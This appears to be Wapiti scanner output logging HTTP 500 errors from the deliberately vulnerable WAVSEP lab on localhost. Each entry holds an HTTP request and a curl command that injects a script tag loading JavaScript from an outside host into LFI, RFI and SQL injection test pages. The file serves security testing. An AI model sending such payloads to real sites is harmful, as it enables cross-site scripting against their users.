The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9r3jjg1b0z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9r3jjg1b0z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fww3q2jjobaz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fww3q2jjobaz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgbcdkfu4pz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgbcdkfu4pz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzo92i231qz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzo92i231qz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzm8o5x3zmz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzm8o5x3zmz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv9ac7i03dz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv9ac7i03dz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2mhjdxan0z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2mhjdxan0z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8jt4qt2prz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8jt4qt2prz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwga74f57mfz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwga74f57mfz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwi60jitk6z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwi60jitk6z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyk0i224a7z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyk0i224a7z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwoadmkgghwz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwoadmkgghwz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlgrlpmdblz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlgrlpmdblz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweljq0fxmqz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweljq0fxmqz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws5dchl42nz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws5dchl42nz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjr797lw3iz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjr797lw3iz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2q8xq4s17z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2q8xq4s17z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcluc7i0jnz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcluc7i0jnz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6654fjkayz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6654fjkayz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3mytoqja7z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3mytoqja7z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw110zi0xs8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw110zi0xs8z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlrir9he4zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlrir9he4zz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo0dmk9ld8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo0dmk9ld8z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfkbt5tvozz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfkbt5tvozz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4nu6z655tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4nu6z655tz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi0jelppa2z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi0jelppa2z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjvgwocwl4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjvgwocwl4z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2yphw8dc4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2yphw8dc4z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweqxfnvn6yz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweqxfnvn6yz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzmyihg7kyz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzmyihg7kyz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwevt8ae4n4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwevt8ae4n4z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
